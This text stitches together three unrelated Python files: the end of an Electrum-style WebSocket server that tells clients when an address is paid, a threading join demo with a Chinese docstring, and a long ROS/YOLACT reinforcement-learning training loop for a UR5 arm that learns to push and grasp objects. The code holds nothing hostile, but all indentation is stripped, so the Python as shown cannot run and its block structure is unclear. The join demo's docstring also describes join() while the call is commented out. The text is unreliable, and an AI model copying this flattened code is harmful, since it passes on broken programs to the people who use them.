def handleConnected(self):
util.print_error("connected", self.address)
def handleClose(self):
util.print_error("closed", self.address)
class WsClientThread(util.DaemonThread):
def __init__(self, config, network):
util.DaemonThread.__init__(self)
self.network = network
self.config = config
self.response_queue = queue.Queue()
self.subscriptions = defaultdict(list)
def make_request(self, request_id):
# read json file
rdir = self.config.get('requests_dir')
n = os.path.join(rdir, 'req', request_id[0], request_id[1], request_id, request_id + '.json')
with open(n, encoding='utf-8') as f:
s = f.read()
d = json.loads(s)
addr = d.get('address')
amount = d.get('amount')
return addr, amount
def reading_thread(self):
while self.is_running():
try:
ws, request_id = request_queue.get()
except queue.Empty:
continue
try:
addr, amount = self.make_request(request_id)
except:
continue
l = self.subscriptions.get(addr, [])
l.append((ws, amount))
self.subscriptions[addr] = l
h = self.network.addr_to_scripthash(addr)
self.network.send([('blockchain.scripthash.subscribe', [h])], self.response_queue.put)
def run(self):
threading.Thread(target=self.reading_thread).start()
while self.is_running():
try:
r = self.response_queue.get(timeout=0.1)
except queue.Empty:
continue
util.print_error('response', r)
method = r.get('method')
params = r.get('params')
result = r.get('result')
if result is None:
continue
if method == 'blockchain.scripthash.subscribe':
self.network.send([('blockchain.scripthash.get_balance', params)], self.response_queue.put)
elif method == 'blockchain.scripthash.get_balance':
h = params[0]
addr = self.network.h2addr.get(h, None)
if addr is None:
util.print_error("can't find address for scripthash: %s" % h)
l = self.subscriptions.get(addr, [])
for ws, amount in l:
if not ws.closed:
                        if sum(result.values()) >= amount:
ws.sendMessage('paid')
class WebSocketServer(threading.Thread):
def __init__(self, config, ns):
threading.Thread.__init__(self)
self.config = config
self.net_server = ns
self.daemon = True
def run(self):
t = WsClientThread(self.config, self.net_server)
t.start()
host = self.config.get('websocket_server')
port = self.config.get('websocket_port', 9999)
certfile = self.config.get('ssl_chain')
keyfile = self.config.get('ssl_privkey')
self.server = SimpleSSLWebSocketServer(host, port, ElectrumWebSocket, certfile, keyfile)
self.server.serveforever()
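# Hedged usage sketch (illustrative only): the server reads its host/port and
# SSL material from the config keys used above; `config` and `network` are
# assumed to come from the running daemon.
#
#   server = WebSocketServer(config, network)
#   server.start()   # daemon thread; serves until the process exits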
|
thread_join.py
|
import threading
import time
"""
测试一下 python 多线程中 join 的功能:
测试结果显示,线程 A 加入 join 后,主线程会等待线程 A 执行完毕后再推出
如果不加 join,主线程不等线程 A 执行完就退出,也就是说,
join 的作用就是线程同步
"""
def run():
time.sleep(2)
    print('Name of the current thread: ', threading.current_thread().name)
time.sleep(2)
if __name__ == '__main__':
start_time = time.time()
    print('This is the main thread:', threading.current_thread().name)
thread_list = []
for i in range(5):
t = threading.Thread(target=run)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
print("join")
#t.join()
    print('The main thread has finished!', threading.current_thread().name)
    print('Total time elapsed:', time.time() - start_time)
|
ros_yolact_rl_grap_main.py
|
#!/usr/bin/env python
import time
import os
import random
import threading
import argparse
import matplotlib.pyplot as plt
import numpy as np
import scipy as sc
import cv2
from collections import namedtuple
import torch
from torch.autograd import Variable
from ros_yolact_rl_grap_robot import Robot
from trainer import Trainer
from logger import Logger
import utils
# ROS
import rospy
import rospkg
from std_msgs.msg import String
from ur_moveit_commands import UR_Moveit_API
from std_srvs.srv import SetBool, SetBoolResponse, SetBoolRequest
from rospy.numpy_msg import numpy_msg
from yolact_ros_msgs.msg import Detections
from yolact_ros_msgs.msg import Detection
from yolact_ros_msgs.msg import Box
from yolact_ros_msgs.msg import Mask
from yolact_ros_msgs.msg import GraspPt
def main(args):
# Can check log msgs according to log_level {rospy.DEBUG, rospy.INFO, rospy.WARN, rospy.ERROR}
rospy.init_node('ur5-grasping', anonymous=True, log_level=rospy.DEBUG)
ur_moveit_api = UR_Moveit_API(boundaries=True)
#ur_moveit_api.move_to_neutral()
'''
r = rospy.Rate(1) # 10hz
while not rospy.is_shutdown():
print ("current pose: ", ur_moveit_api.get_current_pose())
print ("current pose euler: ", ur_moveit_api.quat_to_euler(ur_moveit_api.get_current_pose().pose))
print ("current pose quat: ", ur_moveit_api.euler_to_quat(np.array([1.2, 1.2, -1.20])))
print ("current joint value: ", ur_moveit_api.get_joint_values())
r.sleep()
#ur_moveit_api.move_to_up()
'''
'''
pub = rospy.Publisher('test', numpy_msg(Floats),queue_size=10)
a = np.array([1.0, 2.1, 3.2, 4.3, 5.4, 6.5], dtype=np.float32)
pub.publish(a)
'''
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None # Directory containing 3D mesh files (.obj) of objects to be added to simulation
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = args.tcp_host_ip if not is_sim else None # IP and port to robot arm as TCP client (UR5)
tcp_port = args.tcp_port if not is_sim else None
rtc_host_ip = args.rtc_host_ip if not is_sim else None # IP and port to robot arm as real-time client (UR5)
rtc_port = args.rtc_port if not is_sim else None
if is_sim:
workspace_limits = np.asarray([[-0.724, -0.276], [-0.224, 0.224], [-0.0001, 0.4]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
else:
#workspace_limits = np.asarray([[-0.5, -0.25], [-0.35, 0.35], [0.3, 0.40]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
#workspace_limits = np.asarray([[-0.724, -0.276], [-0.224, 0.224], [0.3, 0.50]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
workspace_limits = np.asarray([[-0.724, -0.276], [-0.3, 0.148], [0.2, 0.35]])
heightmap_resolution = args.heightmap_resolution # Meters per pixel of heightmap
random_seed = args.random_seed
force_cpu = args.force_cpu
# ------------- Algorithm options -------------
method = args.method # 'reactive' (supervised learning) or 'reinforcement' (reinforcement learning ie Q-learning)
push_rewards = args.push_rewards if method == 'reinforcement' else None # Use immediate rewards (from change detection) for pushing?
future_reward_discount = args.future_reward_discount
experience_replay = args.experience_replay # Use prioritized experience replay?
heuristic_bootstrap = args.heuristic_bootstrap # Use handcrafted grasping algorithm when grasping fails too many times in a row?
explore_rate_decay = args.explore_rate_decay
grasp_only = args.grasp_only
# -------------- Testing options --------------
is_testing = args.is_testing
max_test_trials = args.max_test_trials # Maximum number of test runs per case/scenario
test_preset_cases = args.test_preset_cases
test_preset_file = os.path.abspath(args.test_preset_file) if test_preset_cases else None
# ------ Pre-loading and logging options ------
load_snapshot = args.load_snapshot # Load pre-trained snapshot of model?
snapshot_file = os.path.abspath(args.snapshot_file) if load_snapshot else None
continue_logging = args.continue_logging # Continue logging from previous session
logging_directory = os.path.abspath(args.logging_directory) if continue_logging else os.path.abspath('logs')
save_visualizations = args.save_visualizations # Save visualizations of FCN predictions? Takes 0.6s per training step if set to True
# Set random seed
np.random.seed(random_seed)
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing, test_preset_cases, test_preset_file)
# Initialize trainer
trainer = Trainer(method, push_rewards, future_reward_discount,
is_testing, load_snapshot, snapshot_file)
# Initialize data logger
logger = Logger(continue_logging, logging_directory)
logger.save_camera_info(robot.cam_intrinsics, robot.cam_pose, robot.cam_depth_scale) # Save camera intrinsics and pose
logger.save_heightmap_info(workspace_limits, heightmap_resolution) # Save heightmap parameters
# Find last executed iteration of pre-loaded log, and load execution info and RL variables
if continue_logging:
trainer.preload(logger.transitions_directory)
# Initialize variables for heuristic bootstrapping and exploration probability
no_change_count = [2, 2] if not is_testing else [0, 0] # heuristic_bootstrap, training = [2, 2], test = [0, 0], no_change_count[0]=push, [1]=grasp
explore_prob = 0.5 if not is_testing else 0.0
# Quick hack for nonlocal memory between threads in Python 2
nonlocal_variables = {'executing_action' : False,
'primitive_action' : None,
'best_pix_ind' : None,
'push_success' : False,
'grasp_success' : False}
# Get surface_pts for grasping based on Yolact
surface_pts = []
# Parallel thread to process network output and execute actions
# -------------------------------------------------------------
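    # NOTE: the main loop and this worker thread communicate only through the
    # nonlocal_variables dict (a Python 2-friendly substitute for `nonlocal`):
    # the main loop computes push/grasp predictions, sets 'executing_action' to
    # True, then polls until this thread has chosen a primitive, executed it on
    # the robot, and set 'executing_action' back to False.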
def process_actions():
while not rospy.is_shutdown():
if nonlocal_variables['executing_action']:
print('>>>>>>> executing_action start >>>>>>>>>>')
# Determine whether grasping or pushing should be executed based on network predictions
best_push_conf = np.max(push_predictions)
best_grasp_conf = np.max(grasp_predictions)
print('> Primitive confidence scores: %f (push), %f (grasp)' % (best_push_conf, best_grasp_conf))
nonlocal_variables['primitive_action'] = 'grasp'
explore_actions = False
if not grasp_only:
if is_testing and method == 'reactive':
if best_push_conf > 2*best_grasp_conf:
nonlocal_variables['primitive_action'] = 'push'
else:
if best_push_conf > best_grasp_conf:
nonlocal_variables['primitive_action'] = 'push'
explore_actions = np.random.uniform() < explore_prob
if explore_actions: # Exploitation (do best action) vs exploration (do other action)
print('> Strategy: explore (exploration probability: %f)' % (explore_prob))
nonlocal_variables['primitive_action'] = 'push' if np.random.randint(0,2) == 0 else 'grasp'
else:
print('> Strategy: exploit (exploration probability: %f)' % (explore_prob))
trainer.is_exploit_log.append([0 if explore_actions else 1])
logger.write_to_log('is-exploit', trainer.is_exploit_log)
# If heuristic bootstrapping is enabled: if change has not been detected more than 2 times, execute heuristic algorithm to detect grasps/pushes
# NOTE: typically not necessary and can reduce final performance.
if heuristic_bootstrap and nonlocal_variables['primitive_action'] == 'push' and no_change_count[0] >= 2:
print('> Change not detected for more than two pushes. Running heuristic pushing.')
nonlocal_variables['best_pix_ind'] = trainer.push_heuristic(valid_depth_heightmap)
no_change_count[0] = 0
predicted_value = push_predictions[nonlocal_variables['best_pix_ind']]
use_heuristic = True
elif heuristic_bootstrap and nonlocal_variables['primitive_action'] == 'grasp' and no_change_count[1] >= 2:
print('> Change not detected for more than two grasps. Running heuristic grasping.')
nonlocal_variables['best_pix_ind'] = trainer.grasp_heuristic(valid_depth_heightmap)
no_change_count[1] = 0
predicted_value = grasp_predictions[nonlocal_variables['best_pix_ind']]
use_heuristic = True
else:
                    print('> Not running heuristic action; using network predictions.')
use_heuristic = False
# Get pixel location and rotation with highest affordance prediction from heuristic algorithms (rotation, y, x)
if nonlocal_variables['primitive_action'] == 'push':
nonlocal_variables['best_pix_ind'] = np.unravel_index(np.argmax(push_predictions), push_predictions.shape) # https://stackoverflow.com/questions/48135736/what-is-an-intuitive-explanation-of-np-unravel-index/48136499
predicted_value = np.max(push_predictions)
elif nonlocal_variables['primitive_action'] == 'grasp':
nonlocal_variables['best_pix_ind'] = np.unravel_index(np.argmax(grasp_predictions), grasp_predictions.shape)
predicted_value = np.max(grasp_predictions)
trainer.use_heuristic_log.append([1 if use_heuristic else 0])
logger.write_to_log('use-heuristic', trainer.use_heuristic_log)
# Save predicted confidence value
trainer.predicted_value_log.append([predicted_value])
logger.write_to_log('predicted-value', trainer.predicted_value_log)
# Compute 3D position of pixel
                print('> Action: %s at (rotation_ind, pix_y, pix_x) = (%d, %d, %d) in pixel coordinates' % (nonlocal_variables['primitive_action'], nonlocal_variables['best_pix_ind'][0], nonlocal_variables['best_pix_ind'][1], nonlocal_variables['best_pix_ind'][2]))
best_rotation_angle = np.deg2rad(nonlocal_variables['best_pix_ind'][0]*(360.0/trainer.model.num_rotations))
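                # Example: best_pix_ind[0] indexes one of trainer.model.num_rotations
                # discrete heightmap rotations; if num_rotations were 16, index 4 would
                # map to 4 * (360 / 16) = 90 degrees before the conversion to radians.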
best_pix_x = nonlocal_variables['best_pix_ind'][2]
best_pix_y = nonlocal_variables['best_pix_ind'][1]
                # 3D position [x, y, z] in robot (Cartesian) coordinates, converted from the pixel location
primitive_position = [best_pix_x * heightmap_resolution + workspace_limits[0][0], \
best_pix_y * heightmap_resolution + workspace_limits[1][0], \
valid_depth_heightmap[best_pix_y][best_pix_x] + workspace_limits[2][0]]
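                # Example (default heightmap_resolution = 0.002 m/px, workspace x-min = -0.724 m):
                # best_pix_x = 100 maps to x = 100 * 0.002 + (-0.724) = -0.524 m; pixel indices
                # are scaled by the resolution and offset by the workspace minimum on each axis,
                # and z adds the measured surface height to the workspace floor.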
# If pushing, adjust start position, and make sure z value is safe and not too low
if nonlocal_variables['primitive_action'] == 'push': # or nonlocal_variables['primitive_action'] == 'place':
finger_width = 0.144
safe_kernel_width = int(np.round((finger_width/2)/heightmap_resolution))
local_region = valid_depth_heightmap[max(best_pix_y - safe_kernel_width, 0):min(best_pix_y + safe_kernel_width + 1, valid_depth_heightmap.shape[0]), max(best_pix_x - safe_kernel_width, 0):min(best_pix_x + safe_kernel_width + 1, valid_depth_heightmap.shape[1])]
if local_region.size == 0:
safe_z_position = workspace_limits[2][0]
else:
safe_z_position = np.max(local_region) + workspace_limits[2][0]
primitive_position[2] = safe_z_position
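                    # Example: with finger_width = 0.144 m and the default 0.002 m/px resolution,
                    # safe_kernel_width = round(0.072 / 0.002) = 36 px, so the push height is the
                    # highest surface point within a roughly 73 x 73 px window around the target
                    # pixel (clipped at the heightmap border), keeping the gripper above nearby objects.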
# Save executed primitive
if nonlocal_variables['primitive_action'] == 'push':
trainer.executed_action_log.append([0, nonlocal_variables['best_pix_ind'][0], nonlocal_variables['best_pix_ind'][1], nonlocal_variables['best_pix_ind'][2]]) # 0 - push
elif nonlocal_variables['primitive_action'] == 'grasp':
trainer.executed_action_log.append([1, nonlocal_variables['best_pix_ind'][0], nonlocal_variables['best_pix_ind'][1], nonlocal_variables['best_pix_ind'][2]]) # 1 - grasp
logger.write_to_log('executed-action', trainer.executed_action_log)
# Visualize executed primitive, and affordances
if save_visualizations:
push_pred_vis = trainer.get_prediction_vis(push_predictions, mask_color_heightmap, nonlocal_variables['best_pix_ind'])
logger.save_visualizations(trainer.iteration, push_pred_vis, 'push')
cv2.imwrite('visualization.push.png', push_pred_vis)
grasp_pred_vis = trainer.get_prediction_vis(grasp_predictions, mask_color_heightmap, nonlocal_variables['best_pix_ind'])
logger.save_visualizations(trainer.iteration, grasp_pred_vis, 'grasp')
cv2.imwrite('visualization.grasp.png', grasp_pred_vis)
# Initialize variables that influence reward
nonlocal_variables['push_success'] = False
nonlocal_variables['grasp_success'] = False
change_detected = False
                # Execute the chosen primitive ('push' or 'grasp') on the robot
                print('> Action: %s at (x, y, z) = (%f, %f, %f) in robot coordinates' % (nonlocal_variables['primitive_action'], primitive_position[0], primitive_position[1], primitive_position[2]))
                print('> best_rotation_angle: %f rad' % (best_rotation_angle))
if nonlocal_variables['primitive_action'] == 'push':
nonlocal_variables['push_success'] = robot.push(primitive_position, best_rotation_angle, workspace_limits)
print('> Push successful: %r' % (nonlocal_variables['push_success']))
elif nonlocal_variables['primitive_action'] == 'grasp':
nonlocal_variables['grasp_success'] = robot.grasp(primitive_position, best_rotation_angle, workspace_limits)
#nonlocal_variables['grasp_success'] = robot.instance_seg_grasp(primitive_position, grasp_pt, workspace_limits, surface_pts)
print('> Grasp successful: %r' % (nonlocal_variables['grasp_success']))
nonlocal_variables['executing_action'] = False
print('>>>>>>> executing_action end >>>>>>>>>>')
time.sleep(0.01)
action_thread = threading.Thread(target=process_actions)
action_thread.daemon = True
action_thread.start()
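    # The worker runs as a daemon thread, so it is terminated automatically when the
    # main thread exits (e.g., on rospy shutdown) instead of keeping the process alive.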
exit_called = False
# -------------------------------------------------------------
# -------------------------------------------------------------
# Start main training/testing loop
while not rospy.is_shutdown():
print('\n ##### %s iteration: %d ##### ' % ('Testing' if is_testing else 'Training', trainer.iteration))
iteration_time_0 = time.time()
# Make sure simulation is still stable (if not, reset simulation)
if is_sim: robot.check_sim()
if not is_sim:
robot.go_wait_point()
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
color_heightmap, depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
surface_pts = utils.get_surface_pts(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose)
        # Call the ROS service that runs Yolact and returns the detected object's center of mass as a grasp point
robot.start_yolact_eval_service()
grasp_pt = GraspPt()
grasp_pt = robot.get_grasp_pt_msg()
        # Save the color image with the predicted gripper line drawn on it
logger.save_image_with_grasp_line(trainer.iteration, color_img, grasp_pt)
detections = Detections()
detections = robot.get_detections_msg()
        # Build mask heightmaps from the instance-segmentation detections
mask_color_heightmap, mask_depth_heightmap = utils.get_mask_heightmap(detections, color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
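        # NOTE: the network forward pass below consumes the Yolact-masked heightmaps
        # (mask_color_heightmap / valid_mask_depth_heightmap); the unmasked heightmaps are
        # still used for the empty-table check, the safe push height, and logging.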
valid_depth_heightmap = depth_heightmap.copy()
valid_depth_heightmap[np.isnan(valid_depth_heightmap)] = 0
valid_mask_depth_heightmap = mask_depth_heightmap.copy()
valid_mask_depth_heightmap[np.isnan(valid_mask_depth_heightmap)] = 0
# Save RGB-D images and RGB-D heightmaps, Mask heightmaps
logger.save_images(trainer.iteration, color_img, depth_img, '0')
logger.save_heightmaps(trainer.iteration, color_heightmap, valid_depth_heightmap, '0')
logger.save_mask_heightmaps(trainer.iteration, mask_color_heightmap, valid_mask_depth_heightmap, '0')
# Reset simulation or pause real-world training if table is empty
stuff_count = np.zeros(valid_depth_heightmap.shape)
stuff_count[valid_depth_heightmap > 0.02] = 1
        empty_threshold = 300
if is_sim and is_testing:
empty_threshold = 10
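        # Rough scale of the threshold: each heightmap pixel covers heightmap_resolution^2
        # of table area, so with the default 0.002 m/px, 300 occupied pixels (surface higher
        # than 2 cm) correspond to about 300 * (0.002 m)^2 = 12 cm^2 of object footprint.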
        # If the table is (nearly) empty, or nothing has changed for a while in simulation, reset the scene
if np.sum(stuff_count) < empty_threshold or (is_sim and no_change_count[0] + no_change_count[1] > 10):
no_change_count = [0, 0]
cv2.imwrite('valid_depth_heightmap.png', valid_depth_heightmap)
if is_sim:
print('Not enough objects in view (value: %d)! Repositioning objects.' % (np.sum(stuff_count)))
robot.restart_sim()
robot.add_objects()
if is_testing: # If at end of test run, re-load original weights (before test run)
trainer.model.load_state_dict(torch.load(snapshot_file))
else:
print('Not enough stuff on the table (value: %d)! Flipping over bin of objects...' % (np.sum(stuff_count)))
robot.restart_real()
trainer.clearance_log.append([trainer.iteration])
logger.write_to_log('clearance', trainer.clearance_log)
if is_testing and len(trainer.clearance_log) >= max_test_trials:
exit_called = True # Exit after training thread (backprop and saving labels)
continue
        # Skip the forward pass once exit has been requested (e.g., after max_test_trials test runs)
if not exit_called:
# Run forward pass with network to get affordances
print("Run forward pass with network to get affordances!!!!!!")
push_predictions, grasp_predictions, state_feat = trainer.forward(mask_color_heightmap, valid_mask_depth_heightmap, is_volatile=True)
# Execute best primitive action on robot in another thread
nonlocal_variables['executing_action'] = True
# Run training iteration in current thread (aka "training thread")
if 'prev_color_img' in locals():
# Detect changes
depth_diff = abs(depth_heightmap - prev_depth_heightmap)
depth_diff[np.isnan(depth_diff)] = 0
depth_diff[depth_diff > 0.3] = 0
depth_diff[depth_diff < 0.01] = 0
            depth_diff[depth_diff > 0] = 1 # a pixel counts as changed when its depth difference is between 0.01 and 0.3 m
change_threshold = 300
change_value = np.sum(depth_diff)
            change_detected = change_value > change_threshold or prev_grasp_success # a successful grasp always counts as a change
print('(Depth img) Change detected: %r (value: %d)' % (change_detected, change_value))
            # If the scene changed after the previous action, reset that primitive's no-change counter
if change_detected:
                # Reset the counter for the executed primitive
if prev_primitive_action == 'push':
no_change_count[0] = 0
elif prev_primitive_action == 'grasp':
no_change_count[1] = 0
else:
                # No change detected: increment the counter for the executed primitive
if prev_primitive_action == 'push':
no_change_count[0] += 1
elif prev_primitive_action == 'grasp':
no_change_count[1] += 1
# Compute training labels
label_value, prev_reward_value = trainer.get_label_value(prev_primitive_action, prev_push_success, prev_grasp_success, change_detected, prev_push_predictions, prev_grasp_predictions, mask_color_heightmap, valid_mask_depth_heightmap)
trainer.label_value_log.append([label_value])
logger.write_to_log('label-value', trainer.label_value_log)
trainer.reward_value_log.append([prev_reward_value])
logger.write_to_log('reward-value', trainer.reward_value_log)
# Backpropagate
trainer.backprop(prev_color_heightmap, prev_valid_depth_heightmap, prev_primitive_action, prev_best_pix_ind, label_value)
# Adjust exploration probability
if not is_testing:
explore_prob = max(0.5 * np.power(0.9998, trainer.iteration),0.1) if explore_rate_decay else 0.5
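                # With explore_rate_decay, the probability follows 0.5 * 0.9998^iteration,
                # e.g. about 0.41 after 1000 iterations and 0.18 after 5000, reaching the
                # 0.1 floor after roughly 8000 iterations.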
# Do sampling for experience replay
if experience_replay and not is_testing:
sample_primitive_action = prev_primitive_action
if sample_primitive_action == 'push':
sample_primitive_action_id = 0
if method == 'reactive':
sample_reward_value = 0 if prev_reward_value == 1 else 1 # random.randint(1, 2) # 2
elif method == 'reinforcement':
sample_reward_value = 0 if prev_reward_value == 0.5 else 0.5
elif sample_primitive_action == 'grasp':
sample_primitive_action_id = 1
if method == 'reactive':
sample_reward_value = 0 if prev_reward_value == 1 else 1
elif method == 'reinforcement':
sample_reward_value = 0 if prev_reward_value == 1 else 1
# Get samples of the same primitive but with different results
sample_ind = np.argwhere(np.logical_and(np.asarray(trainer.reward_value_log)[1:trainer.iteration,0] == sample_reward_value, np.asarray(trainer.executed_action_log)[1:trainer.iteration,0] == sample_primitive_action_id))
if sample_ind.size > 0:
# Find sample with highest surprise value
if method == 'reactive':
sample_surprise_values = np.abs(np.asarray(trainer.predicted_value_log)[sample_ind[:,0]] - (1 - sample_reward_value))
elif method == 'reinforcement':
sample_surprise_values = np.abs(np.asarray(trainer.predicted_value_log)[sample_ind[:,0]] - np.asarray(trainer.label_value_log)[sample_ind[:,0]])
sorted_surprise_ind = np.argsort(sample_surprise_values[:,0])
sorted_sample_ind = sample_ind[sorted_surprise_ind,0]
pow_law_exp = 2
rand_sample_ind = int(np.round(np.random.power(pow_law_exp, 1)*(sample_ind.size-1)))
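                        # np.random.power(2, 1) samples from p(x) = 2x on [0, 1], biased toward 1,
                        # so after sorting by surprise (ascending) the drawn index tends to land near
                        # the end of the list: transitions with the largest prediction error are
                        # replayed most often (prioritized experience replay).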
sample_iteration = sorted_sample_ind[rand_sample_ind]
print('Experience replay: iteration %d (surprise value: %f)' % (sample_iteration, sample_surprise_values[sorted_surprise_ind[rand_sample_ind]]))
# Load sample RGB-D heightmap
sample_color_heightmap = cv2.imread(os.path.join(logger.mask_color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration)))
sample_color_heightmap = cv2.cvtColor(sample_color_heightmap, cv2.COLOR_BGR2RGB)
sample_depth_heightmap = cv2.imread(os.path.join(logger.mask_depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration)), -1)
sample_depth_heightmap = sample_depth_heightmap.astype(np.float32)/100000
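                        # The depth heightmap is presumably stored by the logger as a 16-bit PNG
                        # scaled by 1e5 (0.01 mm per integer step), hence the division by 100000
                        # to recover metres.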
# Compute forward pass with sample
sample_push_predictions, sample_grasp_predictions, sample_state_feat = trainer.forward(sample_color_heightmap, sample_depth_heightmap, is_volatile=True)
# Load next sample RGB-D heightmap
next_sample_color_heightmap = cv2.imread(os.path.join(logger.mask_color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration+1)))
next_sample_color_heightmap = cv2.cvtColor(next_sample_color_heightmap, cv2.COLOR_BGR2RGB)
next_sample_depth_heightmap = cv2.imread(os.path.join(logger.mask_depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration+1)), -1)
next_sample_depth_heightmap = next_sample_depth_heightmap.astype(np.float32)/100000
sample_push_success = sample_reward_value == 0.5
sample_grasp_success = sample_reward_value == 1
sample_change_detected = sample_push_success
new_sample_label_value, _ = trainer.get_label_value(sample_primitive_action, sample_push_success, sample_grasp_success, sample_change_detected, sample_push_predictions, sample_grasp_predictions, next_sample_color_heightmap, next_sample_depth_heightmap)
# Get labels for sample and backpropagate
sample_best_pix_ind = (np.asarray(trainer.executed_action_log)[sample_iteration,1:4]).astype(int)
trainer.backprop(sample_color_heightmap, sample_depth_heightmap, sample_primitive_action, sample_best_pix_ind, trainer.label_value_log[sample_iteration])
# Recompute prediction value and label for replay buffer
if sample_primitive_action == 'push':
trainer.predicted_value_log[sample_iteration] = [np.max(sample_push_predictions)]
# trainer.label_value_log[sample_iteration] = [new_sample_label_value]
elif sample_primitive_action == 'grasp':
trainer.predicted_value_log[sample_iteration] = [np.max(sample_grasp_predictions)]
# trainer.label_value_log[sample_iteration] = [new_sample_label_value]
else:
print('Not enough prior training samples. Skipping experience replay.')
# Save model snapshot
if not is_testing:
logger.save_backup_model(trainer.model, method)
if trainer.iteration % 10 == 0:
logger.save_model(trainer.iteration, trainer.model, method)
if trainer.use_cuda:
trainer.model = trainer.model.cuda()
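                            # Assumption: logger.save_model moves the weights to the CPU before
                            # writing the snapshot, so the model is moved back onto the GPU here.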
# Sync both action thread and training thread
while nonlocal_variables['executing_action']:
time.sleep(0.01)
if exit_called:
break
# Save information for next training step
prev_color_img = color_img.copy()
prev_depth_img = depth_img.copy()
prev_color_heightmap = mask_color_heightmap.copy()
prev_depth_heightmap = valid_mask_depth_heightmap.copy()
prev_valid_depth_heightmap = valid_depth_heightmap.copy()
prev_push_success = nonlocal_variables['push_success']
prev_grasp_success = nonlocal_variables['grasp_success']
prev_primitive_action = nonlocal_variables['primitive_action']
prev_push_predictions = push_predictions.copy()
prev_grasp_predictions = grasp_predictions.copy()
prev_best_pix_ind = nonlocal_variables['best_pix_ind']
trainer.iteration += 1
iteration_time_1 = time.time()
print('##### Time elapsed: %f ##### \n' % (iteration_time_1-iteration_time_0))
if __name__ == '__main__':
# Parse arguments
parser = argparse.ArgumentParser(description='Train robotic agents to learn how to plan complementary pushing and grasping actions for manipulation with deep reinforcement learning in PyTorch.')
# --------------- Setup options ---------------
parser.add_argument('--is_sim', dest='is_sim', action='store_true', default=False, help='run in simulation?')
parser.add_argument('--obj_mesh_dir', dest='obj_mesh_dir', action='store', default='objects/blocks', help='directory containing 3D mesh files (.obj) of objects to be added to simulation')
parser.add_argument('--num_obj', dest='num_obj', type=int, action='store', default=10, help='number of objects to add to simulation')
parser.add_argument('--tcp_host_ip', dest='tcp_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as TCP client (UR5)')
parser.add_argument('--tcp_port', dest='tcp_port', type=int, action='store', default=30002, help='port to robot arm as TCP client (UR5)')
parser.add_argument('--rtc_host_ip', dest='rtc_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as real-time client (UR5)')
parser.add_argument('--rtc_port', dest='rtc_port', type=int, action='store', default=30003, help='port to robot arm as real-time client (UR5)')
parser.add_argument('--heightmap_resolution', dest='heightmap_resolution', type=float, action='store', default=0.002, help='meters per pixel of heightmap')
parser.add_argument('--random_seed', dest='random_seed', type=int, action='store', default=1234, help='random seed for simulation and neural net initialization')
parser.add_argument('--cpu', dest='force_cpu', action='store_true', default=False, help='force code to run in CPU mode')
# ------------- Algorithm options -------------
    parser.add_argument('--method', dest='method', action='store', default='reinforcement', help='set to \'reactive\' (supervised learning) or \'reinforcement\' (reinforcement learning, i.e. Q-learning)')
parser.add_argument('--push_rewards', dest='push_rewards', action='store_true', default=False, help='use immediate rewards (from change detection) for pushing?')
parser.add_argument('--future_reward_discount', dest='future_reward_discount', type=float, action='store', default=0.5)
parser.add_argument('--experience_replay', dest='experience_replay', action='store_true', default=False, help='use prioritized experience replay?')
parser.add_argument('--heuristic_bootstrap', dest='heuristic_bootstrap', action='store_true', default=False, help='use handcrafted grasping algorithm when grasping fails too many times in a row during training?')
parser.add_argument('--explore_rate_decay', dest='explore_rate_decay', action='store_true', default=False)
parser.add_argument('--grasp_only', dest='grasp_only', action='store_true', default=False)
# -------------- Testing options --------------
parser.add_argument('--is_testing', dest='is_testing', action='store_true', default=False)
parser.add_argument('--max_test_trials', dest='max_test_trials', type=int, action='store', default=30, help='maximum number of test runs per case/scenario')
parser.add_argument('--test_preset_cases', dest='test_preset_cases', action='store_true', default=False)
parser.add_argument('--test_preset_file', dest='test_preset_file', action='store', default='test-10-obj-01.txt')
# ------ Pre-loading and logging options ------
parser.add_argument('--load_snapshot', dest='load_snapshot', action='store_true', default=False, help='load pre-trained snapshot of model?')
parser.add_argument('--snapshot_file', dest='snapshot_file', action='store') # snapshot_file: logs/~/model/snapshot-backup.reinforcement.pth
parser.add_argument('--continue_logging', dest='continue_logging', action='store_true', default=False, help='continue logging from previous session?')
parser.add_argument('--logging_directory', dest='logging_directory', action='store') #logging_directory = "/home/geonhee-ml/ur_ws/src/visual-pushing-grasping/logs/2019-10-22.15:44:06/"
parser.add_argument('--save_visualizations', dest='save_visualizations', action='store_true', default=False, help='save visualizations of FCN predictions?')
# Run main program with specified arguments
args = parser.parse_args()
main(args)